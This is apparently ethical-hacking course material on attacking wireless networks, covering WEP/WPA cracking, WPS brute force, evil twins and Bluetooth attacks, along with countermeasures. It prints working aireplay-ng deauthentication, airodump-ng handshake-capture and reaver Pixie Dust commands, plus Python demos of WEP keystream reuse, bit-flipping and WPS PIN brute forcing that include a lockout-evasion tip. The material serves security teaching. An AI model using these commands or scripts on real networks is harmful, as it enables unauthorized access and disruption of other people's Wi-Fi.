Ethical Hacking v10 Module 14 – Hacking Wireless Networks

Post on 09-Dec-2021


Hacking Wireless Networks

Goals
• Understand Wireless Concepts
• Understand Wireless Encryption Algorithms
• Understand Wireless Threats
• Understand Wireless Hacking Methodologies
• Learn Wireless Hacking Tools
• Understand Bluetooth Hacking Techniques
• Understand Countermeasures to Wireless Hacking
• Learn Wireless Security Tools
• Understand Wireless Penetration Testing

Module 14.0 Hacking Wireless Networks
• 14.1 Wireless Concepts
• 14.2 Wireless Discovery and Mapping
• 14.3 Wi-Fi Sniffers
• 14.4 Wi-Fi Attacks
• 14.5 Wi-Fi Cracking
• 14.6 Wireless Hacking Tools
• 14.7 Bluetooth Hacking
• 14.8 Wireless Hacking Countermeasures
• 14.9 Wireless Security Tools
• 14.10 Wireless Penetration Testing

14.1 Wireless Concepts

Wireless Network Basics

• Wireless Local Area Networks (WLAN)
• Based on the IEEE 802.11 standard
• Uses radio channels for communication
• Devices connect to the network via a wireless access point
• Advantages and disadvantages

Wireless Network Advantages and Disadvantages
• Advantages
• Fast, easy installation
• Easy connectivity where cables can't easily be used
• Internet access from anywhere in range of an access point
• Free internet connections in many public places
• Disadvantages
• Security is a concern: the medium is shared and reachable by anyone in radio range
• Bandwidth is shared: the more devices on the network, the less each one gets
• Upgrades may need new wireless access points and/or wireless cards
• Wi-Fi networks can be disrupted by interference from some electronic equipment

Wireless Terminology

• GSM
• Bandwidth
• BSSID
• ISM Band
• Access Point
• Hotspot
• Association
• Orthogonal Frequency-division Multiplexing (OFDM)
• Direct-sequence Spread Spectrum (DSSS)
• Frequency-hopping Spread Spectrum (FHSS)

How are Wired and Wireless Networks Different?
• Most attacks that work on wired LANs also work against 802.11 Wi-Fi, and the shared radio medium makes several of them easier:
• Sniffing
• Spoofing
• MITM/Hijacking
• Deauthentication (wireless-only: management frames are unauthenticated unless 802.11w is in use)
• DoS
• Other wireless technologies have their own vulnerabilities:
• RFID
• NFC
• Bluetooth
• Cellular

Wireless Network Types

• Extension to a Wired Network
• LAN-to-LAN Wireless Network
• Multiple Access Points
• 3G/4G Hotspot

Accessing Wireless Networks

• 802.11a
• 802.11b
• 802.11g
• 802.11i (security amendment: RSN/WPA2)
• 802.11n
• 802.11ac
• 802.16 (WiMAX)
• 802.15 (WPAN, including 802.15.1 Bluetooth)

Service Set Identifier (SSID)

• A name (up to 32 bytes) that identifies an 802.11 network
• Shared between clients and the access point; a client presents it when it associates
• Normally broadcast by the access point in beacon frames; it is human-readable text
• Each host must be reconfigured when the network SSID is changed
• Clients can be configured to join blank, configured or "any" SSIDs, which makes them easy to lure to rogue APs
• Default values must be changed to ensure security
• "Closed" networks omit the SSID from beacons, but it still appears in cleartext in probe and association frames, so it is not secret from a sniffer

Authentication Modes for Wi-Fi

• Open-System Authentication
• No key; any client can associate (encryption, if any, is negotiated afterwards)
• Shared-Key Authentication
• WEP key set on the WAP and clients; the challenge/response leaks keystream and should not be used
• 802.1X / EAP (WPA/WPA2-Enterprise)
• Port-based access control: the AP relays EAP messages to a RADIUS server and blocks all other traffic until authentication succeeds
• Per-user credentials or certificates; a per-session key is derived instead of one shared PSK
• Captive portal (a separate mechanism, common on hotspots)
• The WAP is open; the client gets a DHCP lease and its browser opens or is redirected to a login page
• Login is checked against a RADIUS or TACACS+ server and the client is granted a short-lived session
• Sometimes other protocols are permitted even before the portal login, and spoofing the MAC/IP of an already authenticated client bypasses the portal

Wi-Fi Chalking

• WarWalking: Attackers on foot use Wi-Fi-enabled laptops or phones to identify open networks
• WarChalking: Drawing symbols in public areas to indicate open networks
• WarFlying: Attackers use drones to identify open networks
• WarDriving: Attackers drive around with Wi-Fi-enabled laptops and identify open networks

Wi-Fi Chalking Symbols

• Free Wi-Fi
• Wi-Fi with WEP
• Wi-Fi with MAC Filtering
• Wi-Fi with Multiple Access Controls
• Restricted Wi-Fi
• Wi-Fi with Closed SSID
• Pay for Wi-Fi
• Wi-Fi Honeypot

Wireless Network Antennas

• Directional antenna
• Omnidirectional antenna
• Parabolic Grid antenna
• Yagi antenna
• Dipole antenna

14.2 Wireless Discovery and Mapping

Wireless Discovery

• Attackers must first discover and footprint the target's wireless networks
• Passive footprinting: listen for beacons and probe responses in monitor mode (no frames sent, so nothing for a WIDS to see)
• Active footprinting: send probe requests and see which APs answer (faster, but detectable)
• Finding a wireless network:
• Attacker first enumerates all networks in range
• Attacker moves around with a wireless laptop to find active networks and estimate where each AP is

Wireless Discovery Tools

• inSSIDer
• NetSurveyor
• Vistumbler
• NetStumbler
• WirelessMon
• Kismet
• WiFi Hopper
• Wavestumbler
• iStumbler
• WiFinder
• Wellenreiter
• AirCheck Wi-Fi Tester
• AirRaider 2
• Xirrus Wi-Fi Inspector
• WiFi Finder
• WeFi

InSSIDer Example

Mobile Wireless Discovery Tools

• WiFiFoFum - WiFi Scanner
• WiFi Manager
• Network Signal Info
• OpenSignal Maps
• Fing
• Overlook WiFi

GPS Mapping

• Attacker builds a map and database of Wi-Fi networks
• Uses GPS to record each network's location and uploads the coordinates to a site
• Attackers share or sell the information

GPS Mapping Tools

• WiGLE
• Skyhook
• TamoGraph
• WiFi Site Survey
• Fluke AirMagnet

14.3 Wi-Fi Sniffers

Wireless Traffic Analysis

• Find vulnerabilities
• Do Wi-Fi reconnaissance
• Use a tool to conduct analysis
• Select the appropriate card/chipset (one whose driver supports monitor mode and packet injection)

Wireless Sniffing

• Use sniffers like Wireshark (on a monitor-mode interface) to capture frames that traverse the air
• By default an interface only receives frames addressed to it, and only for the network it is associated with
• Promiscuous mode is not enough for Wi-Fi: put the interface in monitor mode (airmon-ng start wlan0) to capture all 802.11 frames on a channel, including management frames and frames of networks you are not joined to
• Sniffing enables eavesdropping on communications
• More viable on open Wi-Fi
• Encryption largely mitigates the problem for data payloads
• Some information is sent in cleartext regardless of the encryption mode: 802.11 headers (source, destination and BSSID MAC addresses), SSIDs in beacons and probes, and all management frames
• Use captured MAC addresses in spoofing attacks (for example to bypass MAC filtering or a captive portal)

Wireless Sniffing (cont’d)

• In WPA/WPA2-PSK networks, deauthenticate a client to capture the four-way handshake
• The client must perform the handshake when it reconnects
• The PSK itself is never transmitted: the handshake carries the nonces (ANonce, SNonce) and a MIC computed with a key derived from the PSK
• With the MIC, the nonces and both MAC addresses, PSK candidates can be tested offline (dictionary attack); each guess costs 4096 PBKDF2 iterations
• airodump-ng to sniff for the handshake (on the monitor-mode interface created by airmon-ng):
• airodump-ng -c <channel> --bssid <AP MAC> -w capture wlan0mon
• In a second terminal, aireplay-ng --deauth 5 -a <AP MAC> -c <client MAC> wlan0mon forces the reconnect; airodump-ng shows "WPA handshake:" in its header once it has captured one

Wi-Fi Packet Sniffers

• Wireshark with AirPcap
• SteelCentral Packet Analyzer
• OmniPeek Network Analyzer
• CommView for Wi-Fi
• Sniffer Portable Professional Analyzer
• Capsa
• PRTG Network Monitor
• ApSniff
• NetworkMiner
• Airview
• Observer
• WifiScanner
• Mognet
• AirTraf

14.4 Wi-Fi Attacks

Wireless Threats

• Access Control Attack
• Integrity Attack
• Confidentiality Attack
• Availability Attack
• Authentication Attack
• Rogue Access Point Attack
• Client Mis-association
• Misconfigured WAP
• Unauthorized Association
• Ad Hoc Connection Attack
• HoneySpot Access Point Attack
• AP MAC Spoofing
• DoS Attack
• Jamming Signal Attack
• Wi-Fi Jamming Devices
• MITM
• Evil Twin

Launch Wireless Attacks

• Aircrack-ng Suite
• Reveal Hidden SSIDs
• Fragmentation Attack
• MAC Spoofing Attack
• Deauthentication Attack
• Disassociation Attack
• Man-in-the-Middle Attack
• MITM Attack using Aircrack-ng
• Wireless ARP Poisoning Attack
• Rogue Access Point
• Evil Twin

Evil Twin Attacks

• An Evil Twin attack uses a rogue access point that deceives users into believing it is a legitimate access point
• A form of social engineering
• Often facilitated through deauthentication:
• Attacker knocks the client off the real network
• Client reconnects to the rogue AP
• All manner of attacks can then be launched against the connected victim

Evil Twin Attacks (cont’d)

• Effective because it's not always easy to determine the correct network
• Real and fake can have the same SSID
• Fake can use the same encryption protocol
• Fake can be placed close to the victim so it shows up as a strong signal
• Evil twins are usually open so as not to require a password; note that most operating systems will not auto-join an open network whose SSID matches a saved WPA2 profile, so the attacker either copies the security type or relies on the user picking the network by hand
• Specific attacks leverage the evil twin to make it more effective

Evil Twin Attacks (cont’d)
• Karma attack:
• Many client devices actively send probe requests for the networks in their saved-network list instead of waiting passively for a beacon frame
• Attacker listens for these requests and answers every one with a probe response for the requested SSID from the rogue AP
• Client doesn't need to be close to the real AP; the real AP doesn't even need to be present
• Attacker doesn't need to know or broadcast the spoofed SSID in advance
• Modern clients limit directed probes for saved networks, which reduces Karma's reach; saved open networks remain the easiest targets

Evil Twin Attacks (cont’d)
• Downgrade attack:
• Also called SSL strip
• Entice the victim to connect to the evil twin
• Victim navigates to an HTTPS site (typically via a plain HTTP link or a typed hostname)
• Evil twin acts as a proxy with its own secure connection to the site
• Site responds; the proxy intercepts the response and rewrites https:// links and redirects to http://
• Proxy forwards the rewritten response to the user, who only notices a missing padlock, if at all
• User's transmissions are sent in cleartext to the proxy, which re-encrypts them to the real site
• Caveat: HSTS (especially preloaded HSTS) and browsers that default to HTTPS defeat this, because the browser refuses to load the site over plain HTTP
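The detection side of the evil twin and deauthentication attacks described above, as an added example that is not part of the CEH module or of any WIDS product named in 14.9. It runs two checks over a list of 802.11 management-frame records: a beacon or probe response advertising a known SSID from a BSSID that is not in the inventory (or with weaker security than expected), and a burst of deauthentication frames from one sender. The inventory, the frame records and all addresses are constructed; a real sensor would decode the frames from a monitor-mode capture.

```python
# Added example (not from the CEH module or any WIDS product): the two checks a
# wireless IDS sensor runs against evil twins and deauth floods. The frame
# records are constructed; a real sensor decodes them from a monitor-mode capture.
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

BROADCAST = "ff:ff:ff:ff:ff:ff"
# (timestamp_s, subtype, src/bssid, dst, ssid, protected) -- ssid/protected only for beacons/probe responses
Frame = Tuple[float, str, str, str, Optional[str], Optional[bool]]

# Assumed inventory of authorised APs: SSID -> authorised BSSIDs and whether it must be RSN-protected.
INVENTORY: Dict[str, dict] = {
    "CorpWiFi": {"bssids": {"00:11:22:33:aa:bb", "00:11:22:33:aa:bc"}, "protected": True},
}

# Constructed capture: one real beacon, one evil twin, a 40-frame deauth flood, one normal deauth.
FRAMES: List[Frame] = [
    (0.0, "beacon", "00:11:22:33:aa:bb", BROADCAST, "CorpWiFi", True),
    (0.1, "beacon", "de:ad:be:ef:00:01", BROADCAST, "CorpWiFi", False),   # same SSID, unknown BSSID, open
    *[(1.0 + i * 0.02, "deauth", "00:11:22:33:aa:bb", BROADCAST, None, None) for i in range(40)],
    (5.0, "deauth", "00:11:22:33:aa:bb", "66:77:88:99:cc:dd", None, None),  # a single targeted deauth is normal
]


def detect_evil_twins(frames: List[Frame]) -> List[str]:
    """Flag a known SSID advertised by a BSSID outside the inventory, or by a known BSSID with weaker security."""
    alerts, seen = [], set()
    for _ts, subtype, src, _dst, ssid, protected in frames:
        if subtype not in ("beacon", "probe_resp") or ssid not in INVENTORY or src in seen:
            continue
        seen.add(src)                      # one alert per BSSID, not per beacon
        known = INVENTORY[ssid]
        if src not in known["bssids"]:
            reason = "unknown BSSID" + (", advertises open network" if known["protected"] and not protected else "")
            alerts.append(f"evil twin? SSID {ssid!r} from {src} ({reason})")
        elif known["protected"] and not protected:
            alerts.append(f"security downgrade: authorised BSSID {src} advertises {ssid!r} as open")
    return alerts


def detect_deauth_flood(frames: List[Frame], window_s: float = 2.0, threshold: int = 10) -> List[str]:
    """Sliding window per sender: more than `threshold` deauth/disassoc frames within `window_s` is a flood."""
    alerts, recent, flagged = [], defaultdict(list), set()
    for ts, subtype, src, dst, *_ in frames:
        if subtype not in ("deauth", "disassoc"):
            continue
        window = recent[src]
        window.append(ts)
        while window and ts - window[0] > window_s:
            window.pop(0)                  # drop frames older than the window
        if len(window) > threshold and src not in flagged:
            flagged.add(src)
            alerts.append(f"deauth flood: {len(window)} frames from {src} in {window_s}s (last dst {dst})")
    return alerts


if __name__ == "__main__":
    for alert in detect_evil_twins(FRAMES) + detect_deauth_flood(FRAMES):
        print(alert)
```

The deauth check keys on the sender address, which in a flood is the spoofed address of the real AP; that is exactly why the check cannot tell attacker from AP and why the real fix is 802.11w Protected Management Frames, which make forged deauthentication frames fail verification at the client.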

WiFi-Pumpkin Evil Twin Example

14.5 Wi-Fi Cracking

WEP Cracking

• RC4 stream cipher with a 24-bit Initialization Vector (IV) prepended to the 40- or 104-bit shared key; the IV is sent in cleartext with every frame
• With only 2^24 IVs, keystream reuse is guaranteed on a busy network, and many IVs ("weak IVs") leak key bytes
• Statistical attacks (FMS, KoreK, PTW) recover the key once enough IVs are captured
• On the order of 20,000 IVs for a 40-bit key (64-bit WEP) and 40,000 or more for a 104-bit key (128-bit WEP) with the PTW attack in aircrack-ng
• No keyed integrity check: the CRC-32 ICV is linear, so ciphertext bits can be flipped and the ICV corrected without the key
• No sequencing / replay protection
• Capture a client ARP request and replay it (aireplay-ng -3) to make the AP generate new IVs quickly
• Chopchop (an oracle attack that truncates and modifies ciphertext) and fragmentation attacks recover keystream for a given IV
• Replay attack
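Two of the WEP weaknesses listed above carried through on constructed frames, as an added example that is not part of the CEH module or of aircrack-ng: keystream reuse when a 24-bit IV repeats (recovering one frame's plaintext from another frame the attacker knows), and bit-flipping a ciphertext while fixing the CRC-32 ICV, which works because CRC is linear. The RC4/WEP encryptor, the 40-bit key and the frame contents are constructed here only so the attack can be shown end to end; with a real capture the known plaintext would be a packet the attacker induced (for example one sent to the client from the wired side).

```python
# Added example (not from the CEH module): why WEP's 24-bit IV and CRC-32 ICV
# are fatal. A toy RC4 + WEP encryptor is built here only so the attacks can be
# shown end to end on constructed frames; real captures come from airodump-ng.
import math
import zlib

KEY40 = bytes.fromhex("0123456789")   # constructed 40-bit shared key


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). WEP seeds it with IV || key, so a repeated IV means a repeated keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(iv: bytes, plaintext: bytes, key: bytes = KEY40) -> bytes:
    """WEP frame body: IV (3 bytes, cleartext) || RC4(IV||key, plaintext || CRC-32 ICV)."""
    icv = zlib.crc32(plaintext).to_bytes(4, "little")
    return iv + rc4(iv + key, plaintext + icv)


def wep_decrypt(frame: bytes, key: bytes = KEY40):
    """Returns (plaintext, icv_ok). The AP accepts any frame whose ICV verifies."""
    iv, body = frame[:3], frame[3:]
    data = rc4(iv + key, body)
    plaintext, icv = data[:-4], data[-4:]
    return plaintext, icv == zlib.crc32(plaintext).to_bytes(4, "little")


def keystream_from_known_plaintext(frame: bytes, known: bytes) -> bytes:
    """Attack 1, step 1: ciphertext XOR known plaintext reveals the keystream for that IV."""
    return bytes(c ^ p for c, p in zip(frame[3:], known))


def decrypt_reused_iv(frame: bytes, keystream: bytes) -> bytes:
    """Attack 1, step 2: any later frame with the same IV decrypts with the recovered keystream, no key needed."""
    return bytes(c ^ k for c, k in zip(frame[3:], keystream))


def iv_collision_probability(frames_seen: int) -> float:
    """Birthday bound on a 2^24 IV space: P(at least one repeated IV) after n frames."""
    return 1.0 - math.exp(-(frames_seen ** 2) / (2 * 2 ** 24))


def flip_bits(frame: bytes, delta: bytes) -> bytes:
    """Attack 2: CRC-32 is linear, crc(p ^ d) == crc(p) ^ crc(d) ^ crc(0...0), so the attacker XORs
    a chosen delta into the ciphertext and patches the encrypted ICV without knowing the key."""
    n = len(frame) - 3 - 4                      # plaintext length
    delta = delta.ljust(n, b"\x00")
    icv_delta = (zlib.crc32(delta) ^ zlib.crc32(b"\x00" * n)).to_bytes(4, "little")
    mask = delta + icv_delta
    return frame[:3] + bytes(c ^ m for c, m in zip(frame[3:], mask))


if __name__ == "__main__":
    iv = b"\x01\x02\x03"
    known = b"transfer to account 1000"                 # constructed frame with attacker-known content
    frame = wep_encrypt(iv, known)
    keystream = keystream_from_known_plaintext(frame, known)
    other = wep_encrypt(iv, b"secret: meeting at noon!")  # constructed later frame reusing the IV
    print(decrypt_reused_iv(other, keystream))          # b'secret: meeting at noon!'
    forged = flip_bits(frame, b"\x00" * 20 + b"\x08")   # '1' ^ 0x08 == '9'
    print(wep_decrypt(forged))                          # (b'transfer to account 9000', True)
    print(round(iv_collision_probability(5000), 2))     # 0.53
```

The birthday figure is the point of the 24-bit IV: after about 5,000 frames a repeated IV is more likely than not, and a busy AP sends that many in minutes; the ARP-replay trick in the bullets above simply makes the AP reach that count faster.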

WEP Cracking Example

WPA/WPA2 Cracking

• WPA introduced TKIP: per-packet key mixing and key rotation on top of RC4 (a stop-gap that ran on WEP hardware)
• WPA2 uses much stronger encryption: AES in CCMP mode
• Both carry replay counters (the TKIP sequence counter / CCMP packet number), so WEP-style replay doesn't work
• WPA/WPA2-PSK is still susceptible to an offline dictionary attack on a captured four-way handshake, because the PMK is derived only from the passphrase and the SSID
• WPA2 KRACK attack: the attacker replays message 3 of the four-way handshake so the client "reinstalls" the already-in-use session key; this resets the nonce and replay counter, so keystream is reused and packets can be decrypted or replayed
• The key can be installed several times because the standard lets the AP retransmit message 3 if it believes message 4 was dropped
• In some wpa_supplicant versions (Linux/Android) the reinstall set an all-zero key, making decryption trivial
• Fixed by client patches; KRACK does not recover the passphrase

WPA2 Enterprise

• 802.1X port-based access control with EAP (EAP-TLS, PEAP, EAP-TTLS)
• RADIUS server verifies credentials and returns a per-session key, so there is no shared PSK to crack
• Clients must validate the RADIUS server certificate; otherwise an evil twin running its own RADIUS server can harvest credentials (MSCHAPv2 challenge/responses) from PEAP clients

Wi-Fi Protected Setup (WPS) Attacks

• WPS is an attempt to streamline Wi-Fi setup/device enrollment
• Clients use an 8-digit PIN to connect; the eighth digit is a checksum of the first seven
• Each PIN half is verified separately by the AP (first half in message M4, second half in M6), so the attacker learns when the first half is right
• Only 10,000 + 1,000 = 11,000 possible values instead of 10^7; easy to crack online within hours
• Lockout policies can hamper online PIN cracking
• Might take a couple of weeks, but still feasible
• Lockout may key on the client MAC address, so spoofing a new MAC can bypass it
• Brute forcing may crash or hang certain WAPs (an unintended DoS)
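The online PIN search described above carried through against a constructed registrar, as an added example that is not part of the CEH module or of reaver/bully: the WPS checksum digit, the split M4/M6 verification that lets the two halves be searched independently, and the attempt counts that result (at most 11,000). The registrar class is a stand-in for the AP, with an optional lockout so the lockout case can be shown; a real attack exchanges WPS messages M1 to M7 over the air.

```python
# Added example (not from the CEH module or from reaver/bully): why an online
# WPS PIN attack needs at most 11,000 attempts. The registrar (AP side) is a
# constructed stand-in; a real attack exchanges WPS messages M1..M7 over the air.
from typing import Tuple


def wps_checksum(pin7: int) -> int:
    """Eighth digit of a WPS PIN, chosen so 3*(d1+d3+d5+d7) + (d2+d4+d6) + d8 == 0 (mod 10)."""
    accum = 0
    while pin7:
        accum += 3 * (pin7 % 10)   # odd positions (counting from the left) weigh 3
        pin7 //= 10
        accum += pin7 % 10         # even positions weigh 1
        pin7 //= 10
    return (10 - accum % 10) % 10


def full_pin(first_half: int, second_half: int) -> str:
    """4-digit first half + 3-digit second half + checksum digit."""
    pin7 = first_half * 1000 + second_half
    return f"{pin7:07d}{wps_checksum(pin7)}"


class FakeRegistrar:
    """Constructed AP behaviour: the first PIN half is checked at M4, the second at M6.
    That split is the flaw: the AP confirms half the PIN before it has seen the rest."""

    def __init__(self, pin: str, lockout_after: int = 0):
        if len(pin) != 8 or wps_checksum(int(pin[:7])) != int(pin[7]):
            raise ValueError("not a valid WPS PIN")
        self.pin = pin
        self.lockout_after = lockout_after   # 0 = no lockout (common on older APs)
        self.failures = 0
        self.attempts = 0

    def try_pin(self, pin: str) -> str:
        self.attempts += 1
        if self.lockout_after and self.failures >= self.lockout_after:
            return "LOCKED"
        if pin[:4] != self.pin[:4]:
            self.failures += 1
            return "NACK_M4"       # first half wrong
        if pin[4:7] != self.pin[4:7]:
            self.failures += 1
            return "NACK_M6"       # first half right, second half wrong
        return "M7"                # PIN accepted: M7 carries the network's WPA passphrase


def online_pin_attack(ap: FakeRegistrar) -> Tuple[str, int]:
    """Search the halves independently: at most 10,000 + 1,000 attempts instead of 10^7."""
    for first in range(10_000):
        reply = ap.try_pin(full_pin(first, 0))
        if reply == "LOCKED":
            raise RuntimeError(f"locked out after {ap.attempts} attempts: change MAC and resume")
        if reply != "NACK_M4":
            break                  # NACK_M6 or M7 both confirm the first half
    else:
        raise RuntimeError("first half not found")
    for second in range(1_000):
        reply = ap.try_pin(full_pin(first, second))
        if reply == "LOCKED":
            raise RuntimeError(f"locked out after {ap.attempts} attempts: change MAC and resume")
        if reply == "M7":
            return full_pin(first, second), ap.attempts
    raise RuntimeError("second half not found")


if __name__ == "__main__":
    pin, attempts = online_pin_attack(FakeRegistrar("12345670"))   # a well-known default PIN
    print(pin, attempts)   # 12345670 1803
```

With a lockout of, say, 100 failures the attack raises after 101 attempts; a real attacker resumes from the last first-half value with a new client MAC, which is why the bullets above call MAC-based lockout only a hindrance. Disabling WPS entirely is the effective countermeasure.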

WPS Exploits

• Pixie Dust offline PIN cracking:
• Recovers the PIN in minutes
• In the WPS exchange the AP proves it knows the PIN via two hashes, E-Hash1 and E-Hash2
• Each hash is an HMAC over a secret nonce (E-S1 or E-S2), one PIN half and the two Diffie-Hellman public keys
• Some vendors' APs generate E-S1 and E-S2 from a weak or static PRNG (in some cases they are all zero)
• If the nonces are known, the attacker brute-forces each PIN half offline (10,000 + 1,000 guesses) until the computed hashes match the captured ones, with no further traffic to the AP and no lockout
• Reaver Pixie Dust attack (on the monitor-mode interface):
• reaver -i wlan0mon -b <AP MAC> -c <AP channel> -K 1

Cracking Wireless Encryption – WPA/WEP Cracking Tools
• Aircrack-ng
• Besside-ng
• KisMAC
• Cain & Abel
• Elcomsoft Wireless Security Auditor
• WepAttack
• Wesside-ng
• Reaver Pro
• WEPCrack
• WepDecrypt
• Portable Penetrator
• CloudCracker
• coWPAtty
• Wifite
• WepCrackGui
• Penetrate Pro
• Fern WiFi Cracker

WPS Reaver Attack Example

14.6 Wireless Hacking Tools

Sniffers

• Kismet
• Wireshark
• Airodump-ng
• Vericode
• Monitis

Wardriving Tools

• Airbase-ng
• ApSniff
• WiFiFoFum
• MiniStumbler
• WarLinux
• MacStumbler
• WiFi-Where
• AirFart
• AirTraf
• 802.11 Network Discovery Tools

Monitors

• NetworkManager
• KWiFiManager
• NetworkControl
• Sentry Edge II
• WaveNode
• xosview
• RF Monitor
• DTC-340 RFXpert
• RF Explorer
• Home Curfew RF Monitoring System
• SigMon

Analyzer Tools

• AirMagnet WiFi Analyzer
• OptiView XG Network Analysis Tablet
• Observer
• Ufasoft Snif
• vxSniffer
• OneTouch AT Network Assistant
• Capsa Network Analyzer
• SoftPerfect Network Protocol Analyzer
• OmniPeek Network Analyzer
• CommView for WiFi

Packet Capturing Tools

• WirelessNetView
• Tcpdump
• Airview
• RawCap
• Airodump-ng

Spectrum Analysis Tools

• Cisco Spectrum Expert
• AirMedic USB
• AirSleuth-Pro
• BumbleBee-LX Spectrum Analyzer
• Wi-Spy

MITM / Evil Twin Tools

• Karma
• Wi-Fi Pumpkin
• Wi-Fi Pineapple

Mobile Hacking Tools

• WiHack
• Backtrack Simulator
• Wps Wpa Tester

14.7 Bluetooth Hacking

Bluetooth Modes

• Discoverable Modes:
• Discoverable
• Limited Discoverable
• Non-discoverable
• Pairing Modes:
• Non-pairable
• Pairable

Bluetooth Threats

• Leaking Personal Information
• Controlling Device Remotely
• Device Bugging
• Social Engineering
• Sending False SMS Messages
• Introduction of Malicious Code
• Hiking Up Phone Bill Causing Financial Stress
• Taking Advantage of Vulnerabilities in Protocols

Bluetooth Attacks

• Bluejacking
• Sending unsolicited messages (vCard/OBEX pushes) to discoverable Bluetooth devices
• Bluesnarfing
• Unauthorized information access on a device (contacts, calendar, IMEI) over OBEX
• Bluebugging
• Unauthorized system access to a device (AT-command control: calls, SMS, call forwarding)
• BlueBorne
• A collection of vulnerabilities in Bluetooth stacks (Linux, Android, Windows, iOS), several of them memory-corruption bugs, that can result in arbitrary code execution
• Pairing and discoverability are not required on the target; Bluetooth only needs to be switched on
• Requires no user interaction

Bluesnarfing Example

Bluetooth Attacks (cont’d)

• Bluesmacking
• DoS (oversized L2CAP ping)
• BluePrinting
• Remotely discover details (manufacturer, model, firmware) about Bluetooth-enabled devices
• MAC Spoofing Attack
• Man-in-the-Middle/Impersonation Attack

Bluetooth Hacking Tools

• PhoneSnoop
• BlueScanner
• BH BlueJack
• Bluesnarfer
• btCrawler
• Bluediving
• Blooover II
• btscanner
• CIHwBT
• BT Audit
• Blue Alert
• Blue Sniff

14.8 Wireless Hacking Countermeasures

Defending Against Bluetooth Hacking

• Use non-trivial PINs/passkeys (never 0000 or 1234) and Secure Simple Pairing with numeric comparison where supported
• Keep the device in non-discoverable (hidden) mode
• Keep track of all past paired devices and delete unknown or suspicious ones
• Keep Bluetooth disabled unless required
• Never accept pairing requests from unknown devices
• Ensure encryption is enabled when connecting to a PC

Defending Against Bluetooth Hacking (cont’d)
• Keep device transmit power/range at its lowest
• Only pair with other devices in a secure area
• Ensure antivirus is installed and the Bluetooth stack is patched (BlueBorne was fixed by vendor updates)
• Ensure default security settings are changed to the best possible standard
• Ensure all BT connections use link-level encryption
• Ensure encryption is enabled for all wireless communications

Wireless Security Layers

• Connection Security
• Wireless Signal Security
• Device Security
• End-user Protection
• Data Protection
• Network Protection

Defending Against Wireless Attacks

Configuration Best Practices:
• Change the default SSID once the WLAN is configured
• Disable remote (WAN-side) router login
• Set a strong router admin password and enable firewall protection
• MAC address filtering on routers/access points raises the bar only slightly: client MACs are visible in cleartext and trivially spoofed
• Disabling SSID broadcast likewise only hides the name from casual scans (it still appears in probe and association frames); change the passphrase periodically and whenever staff or devices leave

Defending Against Wireless Attacks (cont’d)

SSID Settings Best Practices:
• SSID cloaking is a weak control; use it, if at all, together with WPA2/WPA3, never instead of it
• Keep passphrases free of the SSID, network/company name, or anything that is easy to guess
• Ensure there is a firewall/packet filter between the AP and the intranet
• Keep transmit power low enough to avoid detection outside the organization, but don't rely on it: a directional antenna picks up the signal from far away
• Regularly audit the setup/configuration for issues
• Use extra traffic encryption (VPN, TLS) on top of the wireless encryption

Defending Against Wireless Attacks (cont’d)

Authentication Best Practices:
• Never use WEP or WPA (TKIP); use WPA2 with AES-CCMP, or WPA3 where supported
• Ensure access points are in physically secure locations
• Disable WPS
• Keep all wireless drivers and firmware up to date (KRACK was fixed by client updates)
• Disable the network when it isn't needed
• Authenticate via a centralized server (802.1X/RADIUS) with server-certificate validation on clients

14.9 Wireless Security Tools

Wireless Security Auditing Tools

• AirMagnet WiFi Analyzer
• Motorola's AirDefense Services Platform (ADSP)
• Adaptive Wireless IPS
• Aruba RFProtect

Wireless Intrusion Prevention Systems

• Extreme Networks Intrusion Prevention System
• AirMagnet Enterprise
• Dell SonicWALL Clean Wireless
• HP TippingPoint NX Platform NGIPS
• AirTight WIPS
• Network Box IDP
• AirMobile Server
• Wireless Policy Manager (WPM)
• ZENworks Endpoint Security Management
• FortiWiFi

Wireless Predictive Planning Tools

• AirMagnet Planner
• Cisco Prime Infrastructure
• AirTight Planner
• LANPlanner
• RingMaster
• Connect EZ Predictive RF CAD Design
• Ekahau Site Survey (ESS)
• ZonePlanner
• Wi-Fi Planning Tool
• TamoGraph Site Survey

Wireless Vulnerability Scanning Tools

• Zenmap
• Nessus
• OSWA-Assistant
• Network Security Toolkit
• Nexpose Community Edition
• WiFish Finder
• Penetrator Vulnerability Scanning Appliance
• SILICA
• WebSploit
• Airbase-ng

Bluetooth Security Tools

• No automatic pairing
• Turn off discovery
• Bluetooth Firewall

Mobile Wi-Fi Security Tools

• WiFi Protector
• WiFiGuard
• Wifi Inspector

14.10 Wireless Penetration Testing

Steps to Penetration Testing Wireless

• Put the card in monitor mode with airmon-ng and discover WAPs with airodump-ng
• Record each WAP's protocols (WEP/WPA/WPA2, TKIP/CCMP, whether WPS is enabled)
• Use directional antennas for better signal gain
• Use Wireshark to capture unencrypted traffic
• Use the Aircrack-ng suite, Fern WiFi Cracker, or Besside-ng to crack WEP, WPA, WPA2
• Use Karma for MITM attacks
• Use Reaver/Pixie Dust to crack WPS
• Use social engineering/evil twins to capture user passwords wirelessly
• Stay within the written scope and authorization; deauthentication and jamming affect every client in range, not only the target

Wireless Hacking Review

• IEEE 802.11 Wi-Fi networks are used for data transfer/communication over radio
• Wi-Fi infrastructure is made of software and hardware
• Most used encryption: WEP, WPA and WPA2; WPA2 (AES-CCMP) is the most secure of the three
• WEP uses a 24-bit IV, the RC4 stream cipher, and a CRC-32 checksum
• WPA uses TKIP: RC4 with a 128-bit encryption key mixed per packet, plus 64-bit Michael MIC keys
• WPA2 uses AES-CCMP with a 128-bit temporal key derived from a 256-bit PMK
• WEP is vulnerable to statistical (analytical) attacks
• Countermeasures to Wi-Fi attacks are wireless IDS systems and best practices for configuration, SSID, and authentication

Penetrating Wireless Networks Review

• Use aircrack-ng to crack keys on Wi-Fi networks secured with WEP
• Use an ARP replay attack to make the AP emit many frames with fresh 24-bit IVs; because the IV space is so small, IVs repeat and weak IVs leak the key
• Speed up WEP cracking with a fragmentation attack using aireplay-ng
• Use the PRGA (keystream) obtained from fragmentation to craft a packet with packetforge-ng
• Send the crafted packet to the AP to easily obtain thousands of IVs
